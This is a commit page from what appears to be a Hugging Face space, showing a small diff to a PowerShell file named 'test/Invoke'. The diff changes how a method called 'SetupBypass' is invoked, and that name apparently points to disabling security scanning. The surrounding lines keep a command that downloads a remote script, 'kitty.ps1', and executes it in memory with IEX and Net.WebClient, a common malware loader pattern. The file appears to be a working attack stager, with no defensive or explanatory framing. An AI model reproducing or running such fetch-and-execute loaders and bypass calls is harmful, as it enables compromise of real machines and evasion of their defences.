enotkrutoy commited on
Commit
474b9e0
·
verified ·
1 Parent(s): b48fe4c

Update test/Invoke

Browse files
Files changed (1) hide show
  1. test/Invoke +1 -2
test/Invoke CHANGED
@@ -290,8 +290,7 @@ namespace Test
290
  }
291
  }
292
  "@
293
-
294
- IEX -Command ([Test.Program]::SetupBypass())
295
 
296
  IEX(New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty.ps1')
297
 
 
290
  }
291
  }
292
  "@
293
+ [Test.Program]::SetupBypass()
 
294
 
295
  IEX(New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty.ps1')
296